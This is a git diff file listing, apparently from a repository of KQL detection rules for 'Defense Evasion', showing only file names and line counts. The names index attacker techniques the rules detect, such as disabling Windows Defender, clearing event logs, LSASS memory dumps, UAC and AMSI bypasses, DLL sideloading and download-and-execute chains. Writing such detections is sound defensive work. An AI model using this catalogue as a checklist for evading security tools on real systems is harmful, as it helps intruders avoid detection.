.../com_object_execution_via_xwizard_exe.kql | 12 + .../Defense Evasion/connection_proxy.kql | 12 + ...urestring_cmdlet_usage_via_commandline.kql | 12 + .../createdump_process_dump.kql | 12 + .../creation_of_non_existent_system_dll.kql | 12 + .../curl_download_and_execute_combination.kql | 10 + ..._file_open_handler_executes_powershell.kql | 10 + .../decode_base64_encoded_text.kql | 12 + .../decode_base64_encoded_text_macos.kql | 12 + ...scan_shellex_context_menu_registry_key.kql | 12 + .../devicecredentialdeployment_execution.kql | 13 + 
...launcher_exe_executes_specified_binary.kql | 12 + ...ibrary_sdiageng_dll_loaded_by_msdt_exe.kql | 10 + .../directory_removal_via_rmdir.kql | 14 ++ ...ore_mode_dsrm_registry_value_tampering.kql | 16 ++ ...ministrative_share_creation_at_startup.kql | 10 + ...network_protection_on_windows_defender.kql | 10 + .../disable_macro_runtime_scan_scope.kql | 10 + ...crosoft_defender_firewall_via_registry.kql | 10 + .../disable_or_stop_services.kql | 12 + ...rivacy_settings_experience_in_registry.kql | 12 + ...ble_pua_protection_on_windows_defender.kql | 10 + .../disable_security_tools.kql | 12 + ..._tamper_protection_on_windows_defender.kql | 10 + ...indows_defender_av_security_monitoring.kql | 12 + ...nder_functionalities_via_registry_keys.kql | 13 + ...ble_windows_event_logging_via_registry.kql | 12 + .../disable_windows_firewall_by_registry.kql | 10 + .../disable_windows_iis_http_logging.kql | 10 + .../disabled_ie_security_features.kql | 10 + .../disabled_volume_snapshots.kql | 12 + .../disabled_windows_defender_eventlog.kql | 12 + .../disabling_security_tools.kql | 12 + ...der_wmi_autologger_session_via_reg_exe.kql | 15 ++ ...ion_from_potential_suspicious_location.kql | 12 + ...de_uncommon_script_extension_execution.kql | 14 ++ .../dism_remove_online_package.kql | 12 + ...splaying_hidden_files_feature_disabled.kql | 12 + .../dll_execution_via_rasautou_exe.kql | 12 + ...stem_process_from_suspicious_locations.kql | 10 + ...from_suspicious_location_via_cmspt_exe.kql | 12 + .../dll_loaded_via_certoc_exe.kql | 10 + .../dll_sideloading_of_shellchromeapi_dll.kql | 12 + ...erserver_function_call_via_msiexec_exe.kql | 10 + ...r_dll_loaded_by_scripting_applications.kql | 10 + ..._to_disallowed_images_in_hvci_registry.kql | 13 + ...iver_dll_installation_via_odbcconf_exe.kql | 12 + ...naries_into_spool_drivers_color_folder.kql | 10 + .../dumpminitool_execution.kql | 10 + .../dumpstack_log_defender_evasion.kql | 10 + .../dynamic_csharp_compile_artefact.kql | 13 + 
.../dynamic_net_compilation_via_csc_exe.kql | 14 ++ ...ocal_manifest_installation_with_winget.kql | 12 + ...nymous_computer_allowanonymouscallback.kql | 12 + ...syslog_configuration_change_via_esxcli.kql | 12 + ...amper_in_net_processes_via_commandline.kql | 14 ++ .../etw_trace_evasion_activity.kql | 11 + .../eventlog_evtx_file_deleted.kql | 10 + .../evtx_created_in_uncommon_location.kql | 16 ++ ...ange_powershell_cmdlet_history_deleted.kql | 12 + .../execute_files_with_msdeploy_exe.kql | 12 + .../execute_from_alternate_data_streams.kql | 10 + ...execute_pcwrun_exe_to_leverage_follina.kql | 12 + .../execution_dll_of_choice_using_wab_exe.kql | 10 + .../execution_of_non_existing_file.kql | 10 + ...tion_of_suspicious_file_type_extension.kql | 12 + .../execution_via_stordiag_exe.kql | 12 + .../execution_via_workfolders_exe.kql | 12 + .../explorer_process_tree_break.kql | 12 + ...coded_from_base64_hex_via_certutil_exe.kql | 10 + .../file_deleted_via_sysinternals_sdelete.kql | 12 + KQL/rules/Defense Evasion/file_deletion.kql | 12 + .../Defense Evasion/file_deletion_via_del.kql | 16 ++ ...ile_download_using_protocolhandler_exe.kql | 11 + .../file_download_via_bitsadmin.kql | 12 + ...itsadmin_to_a_suspicious_target_folder.kql | 10 + ...bitsadmin_to_an_uncommon_target_folder.kql | 10 + .../file_download_via_installutil_exe.kql | 11 + .../file_download_via_nscurl_macos.kql | 12 + ...load_via_windows_defender_mpcmprun_exe.kql | 10 + .../file_download_with_headless_browser.kql | 10 + ...ile_encoded_to_base64_via_certutil_exe.kql | 12 + ...ion_encoded_to_base64_via_certutil_exe.kql | 10 + .../file_time_attribute_change.kql | 10 + ...ous_extension_downloaded_via_bitsadmin.kql | 10 + ...stem_dll_name_in_unsuspected_locations.kql | 14 ++ ..._process_name_in_unsuspected_locations.kql | 15 ++ .../filter_driver_unloaded_via_fltmc_exe.kql | 10 + .../findstr_launching_lnk_file.kql | 10 + .../firewall_disabled_via_netsh_exe.kql | 12 + .../firewall_rule_deleted_via_netsh_exe.kql | 13 + 
.../firewall_rule_update_via_netsh_exe.kql | 13 + .../flush_iptables_ufw_chain.kql | 12 + ...t_guard_protectedfolders_list_registry.kql | 12 + ...orfiles_exe_child_process_masquerading.kql | 11 + .../fsutil_suspicious_invocation.kql | 15 ++ .../gatekeeper_bypass_via_xattr.kql | 12 + .../Defense Evasion/gpscript_execution.kql | 12 + .../greedy_file_deletion_using_del.kql | 10 + .../hacktool_edrsilencer_execution.kql | 13 + .../hacktool_empire_powershell_uac_bypass.kql | 10 + .../hacktool_f_secure_c3_load_by_rundll32.kql | 10 + ...rootkit_detector_and_remover_execution.kql | 12 + .../hacktool_krbrelayup_execution.kql | 12 + .../hacktool_powertool_execution.kql | 12 + .../hacktool_rubeus_execution.kql | 12 + .../hacktool_sharpevtmute_execution.kql | 10 + ...ool_wmiexec_default_powershell_command.kql | 12 + .../hacktool_xordump_execution.kql | 12 + .../Defense Evasion/hh_exe_execution.kql | 12 + ...et_on_file_directory_via_chflags_macos.kql | 14 ++ .../Defense Evasion/hidden_user_creation.kql | 12 + ...e_schedule_task_via_index_value_tamper.kql | 14 ++ .../hiding_files_with_attrib_exe.kql | 13 + ...count_via_specialaccounts_registry_key.kql | 10 + ...ecialaccounts_registry_key_commandline.kql | 13 + ...l_help_hh_exe_suspicious_child_process.kql | 10 + ...visor_enforced_code_integrity_disabled.kql | 11 + ...r_enforced_paging_translation_disabled.kql | 11 + ..._to_mycomputer_zone_for_http_protocols.kql | 11 + .../iis_webserver_access_logs_deleted.kql | 13 + ...log_deletion_via_commandline_utilities.kql | 15 ++ ...devices_unusual_parent_child_processes.kql | 10 + ..._removal_on_host_clear_mac_system_logs.kql | 12 + ...cution_by_program_compatibility_wizard.kql | 13 + ...xecution_from_script_file_via_bash_exe.kql | 12 + ..._inline_command_execution_via_bash_exe.kql | 12 + .../infdefaultinstall_exe_inf_execution.kql | 10 + ...itive_subfolder_search_via_findstr_exe.kql | 13 + ..._new_package_via_winget_local_manifest.kql | 15 ++ .../install_root_certificate.kql | 12 + 
...lorer_disablefirstruncustomize_enabled.kql | 13 + .../invoke_obfuscation_clip_launcher.kql | 10 + ...nvoke_obfuscation_compress_obfuscation.kql | 10 + ..._obfuscation_obfuscated_iex_invocation.kql | 10 + .../invoke_obfuscation_stdin_launcher.kql | 10 + .../invoke_obfuscation_var_launcher.kql | 10 + ...e_obfuscation_var_launcher_obfuscation.kql | 10 + .../invoke_obfuscation_via_stdin.kql | 10 + .../invoke_obfuscation_via_use_clip.kql | 10 + .../invoke_obfuscation_via_use_mshta.kql | 10 + .../jscript_compiler_execution.kql | 14 ++ ...kavremover_dropped_binary_lolbin_usage.kql | 10 + .../kernel_memory_dump_via_livekd.kql | 12 + .../launch_vsdevshell_ps1_proxy_execution.kql | 12 + ...legitimate_application_dropped_archive.kql | 10 + ...itimate_application_dropped_executable.kql | 10 + .../legitimate_application_dropped_script.kql | 10 + .../linux_base64_encoded_pipe_to_shell.kql | 12 + .../linux_base64_encoded_shebang_in_cli.kql | 12 + .../linux_doas_conf_file_creation.kql | 12 + .../linux_doas_tool_execution.kql | 12 + .../linux_package_uninstall.kql | 12 + .../linux_shell_pipe_to_shell.kql | 12 + .../livekd_driver_creation.kql | 12 + ...kd_driver_creation_by_uncommon_process.kql | 12 + ...livekd_kernel_memory_dump_file_created.kql | 12 + ...ol_binary_copied_from_system_directory.kql | 11 + .../lolbin_runexehelper_use_as_proxy.kql | 10 + .../lolbin_unregmp2_exe_use_as_proxy.kql | 10 + ...sa_ppl_protection_disabled_via_reg_exe.kql | 12 + ...on_by_microsoft_visual_studio_debugger.kql | 15 ++ ...nents_file_execution_by_taef_detection.kql | 14 ++ ...inject_inject_dll_into_running_process.kql | 10 + .../maxmpxct_registry_value_changed.kql | 13 + .../microsoft_office_dll_sideload.kql | 12 + ...crosoft_office_protected_view_disabled.kql | 12 + .../modify_group_policy_settings.kql | 12 + .../msdt_execution_via_answer_file.kql | 13 + ...cution_with_suspicious_file_extensions.kql | 16 ++ ...ll_runhtmlapplication_suspicious_usage.kql | 13 + .../msiexec_quiet_installation.kql 
| 14 ++ .../Defense Evasion/msiexec_web_install.kql | 12 + .../Defense Evasion/msxsl_exe_execution.kql | 14 ++ ..._policy_on_microsoft_defender_firewall.kql | 12 + ..._connection_initiated_by_addinutil_exe.kql | 12 + ...capture_session_launched_via_dxcap_exe.kql | 13 + .../new_dll_registered_via_odbcconf_exe.kql | 12 + .../new_file_association_using_exefile.kql | 10 + .../new_firewall_rule_added_via_netsh_exe.kql | 13 + .../new_process_created_via_taskmgr_exe.kql | 12 + ..._certificate_installed_via_certmgr_exe.kql | 14 ++ ...certificate_installed_via_certutil_exe.kql | 14 ++ .../node_process_executions.kql | 10 + ...rshell_download_cradle_processcreation.kql | 10 + .../ntdllpipe_like_activity_execution.kql | 10 + ...l_msi_install_via_windowsinstaller_com.kql | 15 ++ ...fuscated_powershell_oneliner_execution.kql | 10 + .../odbcconf_exe_suspicious_dll_location.kql | 12 + ...network_connection_over_uncommon_ports.kql | 12 + ...tls1_0_tls1_1_protocol_version_enabled.kql | 12 + ...nt_file_dropped_in_suspicious_location.kql | 12 + ...xecution_of_malicious_embedded_scripts.kql | 14 ++ ...openwith_exe_executes_specified_binary.kql | 10 + ...work_connection_initiated_by_cmstp_exe.kql | 12 + ...k_connection_to_public_ip_via_winlogon.kql | 12 + .../outgoing_logon_with_new_credentials.kql | 12 + ...rd_provided_in_command_line_of_net_exe.kql | 10 + .../pdf_file_created_by_regedit_exe.kql | 14 ++ KQL/rules/Defense Evasion/ping_hex_ip.kql | 12 + .../potential_7za_dll_sideloading.kql | 12 + .../potential_adplus_exe_abuse.kql | 12 + .../potential_amsi_bypass_using_null_bits.kql | 10 + ...tential_amsi_bypass_via_net_reflection.kql | 12 + .../potential_amsi_com_server_hijacking.kql | 10 + ...ial_antivirus_software_dll_sideloading.kql | 14 ++ ...cation_whitelisting_bypass_via_dnx_exe.kql | 14 ++ ..._arbitrary_code_execution_via_node_exe.kql | 12 + ...trary_command_execution_using_msdt_exe.kql | 10 + ...ntial_arbitrary_dll_load_using_winword.kql | 10 + 
...file_download_using_office_application.kql | 10 + ...t_manager_settings_associations_tamper.kql | 12 + ...nt_manager_settings_attachments_tamper.kql | 12 + ...otential_autologger_sessions_tampering.kql | 10 + .../potential_base64_decoded_from_images.kql | 11 + ..._proxy_execution_via_vsdiagnostics_exe.kql | 12 + .../potential_ccleanerdu_dll_sideloading.kql | 12 + ...al_ccleanerreactivator_dll_sideloading.kql | 12 + ...al_chrome_frame_helper_dll_sideloading.kql | 10 + ...nd_line_path_traversal_evasion_attempt.kql | 13 + ...ne_obfuscation_using_escape_characters.kql | 10 + ...icode_characters_from_suspicious_image.kql | 12 + ...ealing_via_chromium_headless_debugging.kql | 10 + ...ivity_via_emoji_usage_in_commandline_1.kql | 10 + ...ivity_via_emoji_usage_in_commandline_2.kql | 10 + ...ivity_via_emoji_usage_in_commandline_3.kql | 10 + ...ivity_via_emoji_usage_in_commandline_4.kql | 10 + ...tial_defense_evasion_via_binary_rename.kql | 12 + ...via_rename_of_highly_relevant_binaries.kql | 13 + ...nse_evasion_via_right_to_left_override.kql | 14 ++ ...tential_dll_sideloading_of_dbgcore_dll.kql | 12 + ...tential_dll_sideloading_of_dbghelp_dll.kql | 12 + ...sideloading_of_libcurl_dll_via_gup_exe.kql | 10 + ..._sideloading_via_classicexplorer32_dll.kql | 10 + ...ntial_dll_sideloading_via_comctl32_dll.kql | 12 + ...potential_dll_sideloading_via_jsschhlp.kql | 10 + ...ded_powershell_patterns_in_commandline.kql | 10 + ...ntial_eventlog_file_location_tampering.kql | 10 + ...al_fake_instance_of_hxtsr_exe_executed.kql | 13 + ...d_via_ms_appinstaller_protocol_handler.kql | 12 + ...ation_via_ntfs_index_allocation_stream.kql | 13 + ...n_via_ntfs_index_allocation_stream_cli.kql | 13 + ...lyph_attack_using_lookalike_characters.kql | 15 ++ ...using_lookalike_characters_in_filename.kql | 15 ++ ...otential_lethalhta_technique_execution.kql | 10 + .../potential_libvlc_dll_sideloading.kql | 12 + ...ential_lsass_process_dump_via_procdump.kql | 17 ++ 
...anage_bde_wsf_abuse_to_proxy_execution.kql | 12 + ...ial_memory_dumping_activity_via_livekd.kql | 12 + ...tial_meterpreter_cobaltstrike_activity.kql | 13 + .../potential_mftrace_exe_abuse.kql | 12 + .../potential_msiexec_masquerading.kql | 10 + ...tential_ntlm_coercion_via_certutil_exe.kql | 10 + ...l_obfuscated_ordinal_call_via_rundll32.kql | 10 + ...word_spraying_attempt_using_dsacls_exe.kql | 12 + ..._pendingfilerenameoperations_tampering.kql | 13 + ...tial_persistence_via_outlook_home_page.kql | 12 + ...ial_persistence_via_outlook_today_page.kql | 12 + .../potential_powershell_downgrade_attack.kql | 10 + ..._powershell_execution_policy_tampering.kql | 10 + ...xecution_policy_tampering_proccreation.kql | 10 + ...potential_powershell_execution_via_dll.kql | 12 + ...hell_obfuscation_via_reversed_commands.kql | 12 + ...lation_attempt_via_exe_local_technique.kql | 10 + ..._execution_proxy_via_cl_invocation_ps1.kql | 10 + ...y_key_abuse_for_binary_proxy_execution.kql | 10 + ...y_abuse_for_binary_proxy_execution_reg.kql | 10 + ...aunch_exe_binary_proxy_execution_abuse.kql | 10 + ...thorized_mbr_tampering_via_bcdedit_exe.kql | 10 + ...ntial_register_app_vbs_lolscript_abuse.kql | 12 + ...tial_regsvr32_commandline_flag_anomaly.kql | 12 + ...dll32_execution_with_dll_stored_in_ads.kql | 10 + ...xy_execution_via_cl_mutexverifiers_ps1.kql | 10 + ..._bypass_via_windows_developer_features.kql | 10 + ...ia_windows_developer_features_registry.kql | 10 + ...potential_suspicious_mofcomp_execution.kql | 13 + ...s_windows_feature_enabled_proccreation.kql | 14 ++ ...otential_sysinternals_procdump_evasion.kql | 12 + ..._sideloading_from_non_system_locations.kql | 12 + ...pering_with_security_products_via_wmic.kql | 12 + ...azuh_security_platform_dll_sideloading.kql | 12 + ...t_reflectdebugger_registry_value_abuse.kql | 10 + ...indows_defender_tampering_via_wmic_exe.kql | 10 + .../potential_winnti_dropper_activity.kql | 10 + ...e_permissions_granted_using_dsacls_exe.kql | 12 + 
...asp_net_compilation_via_aspnetcompiler.kql | 10 + ...ally_suspicious_cabinet_file_expansion.kql | 12 + ...ous_call_to_win32_nteventlogfile_class.kql | 10 + ...icious_child_process_of_diskshadow_exe.kql | 12 + ...y_suspicious_child_process_of_regsvr32.kql | 12 + ...ous_child_processes_spawned_by_conhost.kql | 12 + ...y_suspicious_cmd_shell_output_redirect.kql | 14 ++ ...icious_dll_registered_via_odbcconf_exe.kql | 12 + ...ally_suspicious_dmp_hdmp_file_creation.kql | 12 + ..._suspicious_event_viewer_child_process.kql | 10 + ...n_from_parent_process_in_public_folder.kql | 11 + ...y_suspicious_execution_from_tmp_folder.kql | 10 + ..._regasm_regsvcs_from_uncommon_location.kql | 10 + ...regasm_regsvcs_with_uncommon_extension.kql | 10 + ..._suspicious_googleupdate_child_process.kql | 10 + ...ocument_executed_from_trusted_location.kql | 10 + ...spicious_ping_copy_command_combination.kql | 11 + ...y_suspicious_regsvr32_http_ftp_pattern.kql | 10 + ...ly_suspicious_regsvr32_http_ip_pattern.kql | 12 + ...tentially_suspicious_rundll32_activity.kql | 12 + ...ous_rundll32_exe_execution_of_udl_file.kql | 14 ++ ...s_volume_shadow_copy_vsstrace_dll_load.kql | 10 + ...y_suspicious_wdac_policy_file_creation.kql | 13 + ...tially_suspicious_windows_app_activity.kql | 12 + ..._suspicious_wuauclt_network_connection.kql | 12 + ...base64_encoded_frombase64string_cmdlet.kql | 10 + ...ell_base64_encoded_mppreference_cmdlet.kql | 10 + ...owershell_console_history_logs_deleted.kql | 10 + ...core_dll_loaded_via_office_application.kql | 10 + ...wershell_defender_disable_scan_feature.kql | 13 + .../powershell_defender_exclusion.kql | 13 + ...fault_action_set_to_allow_or_noaction_.kql | 15 ++ ...executed_from_headless_conhost_process.kql | 12 + ...ng_disabled_via_registry_key_tampering.kql | 10 + ...l_script_change_permission_via_set_acl.kql | 10 + .../powershell_set_acl_on_windows_folder.kql | 10 + ...ell_token_obfuscation_process_creation.kql | 10 + .../Defense 
Evasion/prefetch_file_deleted.kql | 10 + .../Defense Evasion/procdump_execution.kql | 12 + ...ss_access_via_trolleyexpress_exclusion.kql | 10 + ...rocess_creation_using_sysnative_folder.kql | 10 + ...n_from_a_potentially_suspicious_folder.kql | 10 + .../process_launched_without_image_name.kql | 12 + .../process_memory_dump_via_comsvcs_dll.kql | 12 + .../process_memory_dump_via_dotnet_dump.kql | 13 + ...ocess_proxy_execution_via_squirrel_exe.kql | 13 + .../proxy_execution_via_vshadow.kql | 16 ++ .../proxy_execution_via_wuauclt_exe.kql | 10 + ...olicytest_creation_by_uncommon_process.kql | 10 + .../pua_advancedrun_suspicious_execution.kql | 10 + .../pua_cleanwipe_execution.kql | 12 + .../pua_defendercheck_execution.kql | 12 + ...ential_pe_metadata_tamper_using_rcedit.kql | 12 + .../pua_process_hacker_execution.kql | 15 ++ ...nt_file_dropped_in_suspicious_location.kql | 12 + .../pubprn_vbs_proxy_execution.kql | 10 + ...ion_security_warning_disabled_in_excel.kql | 12 + ...ity_warning_disabled_in_excel_registry.kql | 12 + ...ython_image_load_by_non_python_process.kql | 17 ++ .../Defense Evasion/raccine_uninstall.kql | 12 + .../rdp_connection_allowed_via_netsh_exe.kql | 12 + .../rdp_sensitive_settings_changed.kql | 14 ++ ...rdp_sensitive_settings_changed_to_zero.kql | 14 ++ ...ion_without_commandline_flags_or_files.kql | 14 ++ ...iating_network_connection_to_public_ip.kql | 10 + .../regedit_as_trusted_installer.kql | 12 + .../register_app_vbs_proxy_execution.kql | 12 + .../registry_entries_for_azorult_malware.kql | 10 + ...y_persistence_via_service_in_safe_mode.kql | 10 + ...ecution_with_suspicious_file_extension.kql | 12 + ...cution_from_highly_suspicious_location.kql | 12 + ...ion_from_potential_suspicious_location.kql | 12 + ..._rurat_execution_from_unusual_location.kql | 10 + ...chm_file_download_execution_via_hh_exe.kql | 10 + .../remote_code_execute_via_winrm_vbs.kql | 10 + .../remote_file_download_via_findstr_exe.kql | 11 + 
.../remote_xsl_execution_via_msxsl_exe.kql | 12 + ...ablement_abuse_via_atomictestharnesses.kql | 10 + ...hosted_hta_file_executed_via_mshta_exe.kql | 10 + ...removal_of_amsi_provider_registry_keys.kql | 12 + ...x_value_to_hide_schedule_task_registry.kql | 10 + ...d_value_to_hide_schedule_task_registry.kql | 10 + .../remove_immutable_file_attribute.kql | 12 + .../remove_scheduled_cron_task_job.kql | 12 + .../renamed_autohotkey_exe_execution.kql | 10 + .../renamed_boinc_client_execution.kql | 10 + .../renamed_createdump_utility_execution.kql | 12 + .../renamed_mavinject_exe_execution.kql | 12 + .../renamed_megasync_execution.kql | 13 + .../renamed_microsoft_teams_execution.kql | 10 + .../renamed_msdt_exe_execution.kql | 12 + .../renamed_office_binary_execution.kql | 10 + .../renamed_plink_execution.kql | 10 + .../renamed_procdump_execution.kql | 15 ++ ...d_remote_utilities_rat_rurat_execution.kql | 10 + ...sponse_file_execution_via_odbcconf_exe.kql | 12 + ...tificate_installed_from_susp_locations.kql | 12 + .../run_powershell_script_from_ads.kql | 10 + ...ll_script_from_redirected_input_stream.kql | 10 + ..._execution_with_uncommon_dll_extension.kql | 10 + ...ecution_without_commandline_parameters.kql | 12 + .../rundll32_installscreensaver_execution.kql | 12 + .../rundll32_internet_connection.kql | 12 + .../rundll32_spawned_via_explorer_exe.kql | 10 + .../rundll32_spawning_explorer.kql | 10 + .../rundll32_unc_path_execution.kql | 12 + .../runmru_registry_key_deletion.kql | 13 + .../runmru_registry_key_deletion_registry.kql | 13 + ...eboot_registry_key_deleted_via_reg_exe.kql | 12 + .../Defense Evasion/scr_file_write_event.kql | 12 + .../screensaver_registry_key_set.kql | 12 + ...ostics_turn_off_check_enabled_registry.kql | 12 + ...g_commandline_process_spawned_regsvr32.kql | 13 + .../Defense Evasion/sdclt_child_processes.kql | 10 + ...nhost_calling_suspicious_child_process.kql | 10 + .../security_service_disabled_via_reg_exe.kql | 12 + 
...e_from_potentially_suspicious_location.kql | 14 ++ ...ted_in_potentially_suspicious_location.kql | 13 + ...rvice_registry_key_deleted_via_reg_exe.kql | 12 + ...files_as_system_files_using_attrib_exe.kql | 11 + .../Defense Evasion/setuid_and_setgid.kql | 12 + ...tion_using_operating_systems_utilities.kql | 13 + ..._dll_execution_in_suspicious_directory.kql | 10 + .../space_after_filename_macos.kql | 12 + .../start_of_nt_virtual_dos_machine.kql | 12 + .../suspect_svchost_activity.kql | 12 + ...spicious_advpack_call_via_rundll32_exe.kql | 12 + ...ous_agentexecutor_powershell_execution.kql | 10 + ...lication_allowed_through_exploit_guard.kql | 12 + ..._access_agent_update_utility_execution.kql | 12 + ...us_cabinet_file_execution_via_msdt_exe.kql | 12 + .../suspicious_calculator_usage.kql | 11 + ...icious_child_process_created_as_system.kql | 10 + ...icious_child_process_of_aspnetcompiler.kql | 10 + ...suspicious_child_process_of_wermgr_exe.kql | 10 + .../suspicious_codepage_switch_via_chcp.kql | 12 + .../suspicious_control_panel_dll_load.kql | 10 + ...cious_copy_from_or_to_system_directory.kql | 16 ++ .../suspicious_creation_with_colorcpl.kql | 10 + .../suspicious_customshellhost_execution.kql | 13 + ...diantz_alternate_data_stream_execution.kql | 12 + .../suspicious_dll_loaded_via_certoc_exe.kql | 10 + .../suspicious_double_extension_files.kql | 12 + ..._download_from_direct_ip_via_bitsadmin.kql | 10 + ...rom_file_sharing_website_via_bitsadmin.kql | 12 + .../suspicious_download_via_certutil_exe.kql | 10 + ...iver_dll_installation_via_odbcconf_exe.kql | 12 + .../suspicious_dumpminitool_execution.kql | 10 + ...vironment_variable_has_been_registered.kql | 10 + ...aring_or_configuration_change_activity.kql | 16 ++ .../suspicious_executable_file_creation.kql | 12 + ...s_execution_of_installutil_without_log.kql | 10 + ...trac32_alternate_data_stream_execution.kql | 10 + ...s_file_created_via_onenote_application.kql | 13 + ...le_creation_in_uncommon_appdata_folder.kql | 
12 + ...loaded_from_direct_ip_via_certutil_exe.kql | 10 + ..._file_sharing_website_via_certutil_exe.kql | 10 + ...ile_encoded_to_base64_via_certutil_exe.kql | 10 + ...suspicious_files_in_default_gpo_folder.kql | 10 + .../suspicious_hh_exe_execution.kql | 10 + ...h_integritylevel_conhost_legacy_option.kql | 12 + ...iis_url_globalrules_rewrite_via_appcmd.kql | 12 + ...ous_javascript_execution_via_mshta_exe.kql | 10 + ...ious_lnk_double_extension_file_created.kql | 13 + ...picious_microsoft_office_child_process.kql | 10 + ...d_execution_by_uncommon_parent_process.kql | 10 + .../suspicious_msdt_parent_process.kql | 10 + .../suspicious_mshta_child_process.kql | 13 + .../suspicious_msiexec_embedding_parent.kql | 10 + ...spicious_msiexec_execute_arbitrary_dll.kql | 14 ++ ...xec_quiet_install_from_remote_location.kql | 10 + ...twork_connection_binary_no_commandline.kql | 10 + .../suspicious_obfuscated_powershell_code.kql | 10 + .../suspicious_package_installed_linux.kql | 12 + ...parent_double_extension_file_execution.kql | 10 + ...eyboard_layout_ime_file_registry_value.kql | 13 + ...uspicious_ping_del_command_combination.kql | 10 + ...xecution_to_change_lock_screen_timeout.kql | 10 + ...l_invocations_specific_processcreation.kql | 10 + ...us_process_masquerading_as_svchost_exe.kql | 14 ++ .../suspicious_process_parents.kql | 10 + .../suspicious_process_start_locations.kql | 12 + ..._via_werfaultsecure_through_edr_freeze.kql | 13 + ...ous_procexp152_sys_file_created_in_tmp.kql | 14 ++ ..._whitelisted_in_firewall_via_netsh_exe.kql | 10 + ...uspicious_provlaunch_exe_child_process.kql | 10 + .../suspicious_rasdial_activity.kql | 12 + .../suspicious_recursive_takeown.kql | 13 + ...s_regsvr32_execution_from_remote_share.kql | 10 + ...sponse_file_execution_via_odbcconf_exe.kql | 12 + ...us_rundll32_activity_invoking_sys_file.kql | 10 + ...undll32_execution_with_image_extension.kql | 10 + ...picious_rundll32_setupapi_dll_activity.kql | 12 + 
.../suspicious_service_binary_directory.kql | 10 + .../suspicious_service_installed.kql | 14 ++ ...ious_shellexec_rundll_call_via_ordinal.kql | 12 + ...us_speech_runtime_binary_child_process.kql | 14 ++ .../suspicious_splwow64_without_params.kql | 10 + ...indows_defender_feature_via_powershell.kql | 11 + .../suspicious_usage_of_shellexec_rundll.kql | 10 + ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 13 + ...ous_volume_shadow_copy_vssapi_dll_load.kql | 10 + ...t_command_with_agentextensionpath_load.kql | 12 + ...der_folder_exclusion_added_via_reg_exe.kql | 12 + ...der_registry_key_tampering_via_reg_exe.kql | 13 + .../suspicious_windows_service_tampering.kql | 13 + ...race_etw_session_tamper_via_logman_exe.kql | 13 + ...ous_windows_update_agent_empty_cmdline.kql | 11 + ...uspicious_wordpad_outbound_connections.kql | 14 ++ ...cious_workstation_locking_via_rundll32.kql | 12 + ...icious_x509enrollment_process_creation.kql | 12 + ...picious_xor_encoded_powershell_command.kql | 10 + ...rver_execute_arbitrary_powershell_code.kql | 12 + ..._vbs_execute_arbitrary_powershell_code.kql | 10 + ...ternals_pssuspend_suspicious_execution.kql | 12 + ...earing_or_removal_via_system_utilities.kql | 14 ++ .../sysmon_configuration_update.kql | 12 + .../sysmon_driver_altitude_change.kql | 14 ++ .../sysmon_driver_unloaded_via_fltmc_exe.kql | 12 + ...nel_item_loaded_from_uncommon_location.kql | 10 + ...system_file_execution_location_anomaly.kql | 11 + ...information_discovery_via_sysctl_macos.kql | 14 ++ ...r_windows_defender_remove_mppreference.kql | 12 + .../tamper_with_sophos_av_registry_keys.kql | 12 + .../taskkill_symantec_endpoint_protection.kql | 13 + .../taskmgr_as_local_system.kql | 10 + .../teamviewer_log_file_deleted.kql | 10 + .../third_party_software_dll_sideloading.kql | 10 + .../time_travel_debugging_utility_usage.kql | 12 + ...e_travel_debugging_utility_usage_image.kql | 12 + .../tomcat_webserver_logs_deleted.kql | 13 + .../touch_suspicious_service_file.kql | 12 + 
...le_cross_ebpf_rootkit_default_lockfile.kql | 12 + ...riple_cross_ebpf_rootkit_execve_hijack.kql | 12 + ...le_cross_ebpf_rootkit_install_commands.kql | 12 + ...ypass_abusing_winsat_path_parsing_file.kql | 10 + ...ss_abusing_winsat_path_parsing_process.kql | 10 + ...s_abusing_winsat_path_parsing_registry.kql | 10 + ...ac_bypass_tools_using_computerdefaults.kql | 10 + .../uac_bypass_using_changepk_and_slui.kql | 10 + ...bypass_using_consent_and_comctl32_file.kql | 10 + ...ass_using_consent_and_comctl32_process.kql | 10 + .../uac_bypass_using_disk_cleanup.kql | 10 + .../uac_bypass_using_dismhost.kql | 10 + ..._bypass_using_event_viewer_recentviews.kql | 10 + .../uac_bypass_using_eventvwr.kql | 10 + .../uac_bypass_using_ieinstal_file.kql | 10 + .../uac_bypass_using_ieinstal_process.kql | 10 + .../uac_bypass_using_iscsicpl_imageload.kql | 10 + ...using_msconfig_token_modification_file.kql | 10 + ...ng_msconfig_token_modification_process.kql | 10 + ..._bypass_using_net_code_profiler_on_mmc.kql | 10 + ...c_bypass_using_ntfs_reparse_point_file.kql | 10 + ...ypass_using_ntfs_reparse_point_process.kql | 10 + .../uac_bypass_using_pkgmgr_and_dism.kql | 10 + ...bypass_using_windows_media_player_file.kql | 10 + ...ass_using_windows_media_player_process.kql | 10 + ...ss_using_windows_media_player_registry.kql | 10 + .../uac_bypass_via_event_viewer.kql | 10 + .../uac_bypass_via_icmluautil.kql | 10 + .../Defense Evasion/uac_bypass_via_sdclt.kql | 10 + ...ss_via_windows_firewall_snap_in_hijack.kql | 10 + .../uac_bypass_via_wsreset.kql | 10 + .../Defense Evasion/uac_bypass_wsreset.kql | 10 + .../ufw_force_stop_using_ufw_init.kql | 12 + ...on_addinutil_exe_commandline_execution.kql | 11 + ...pplications_execution_via_atbroker_exe.kql | 12 + ...ncommon_child_process_of_addinutil_exe.kql | 11 + .../uncommon_child_process_of_appvlp_exe.kql | 14 ++ ...ommon_child_process_of_defaultpack_exe.kql | 10 + .../uncommon_child_process_of_setres_exe.kql | 15 ++ 
..._child_process_spawned_by_odbcconf_exe.kql | 13 + ...eyboard_layout_ime_file_registry_value.kql | 15 ++ ..._file_creation_by_mysql_daemon_process.kql | 12 + ..._filesystem_load_attempt_by_format_com.kql | 11 + .../uncommon_link_exe_parent_process.kql | 15 ++ .../uncommon_outbound_kerberos_connection.kql | 13 + .../uncommon_sigverif_exe_child_process.kql | 11 + .../uncommon_svchost_parent_process.kql | 10 + .../uninstall_crowdstrike_falcon_sensor.kql | 12 + .../uninstall_sysinternals_sysmon.kql | 12 + .../unmount_share_via_net_exe.kql | 12 + .../use_icacls_to_hide_file_to_everyone.kql | 10 + .../use_ntfs_short_name_in_command_line.kql | 12 + .../use_ntfs_short_name_in_image.kql | 12 + .../Defense Evasion/use_of_remote_exe.kql | 12 + .../use_of_scriptrunner_exe.kql | 12 + ...use_of_the_sftp_exe_binary_as_a_lolbin.kql | 10 + .../Defense Evasion/use_of_ttdinject_exe.kql | 12 + 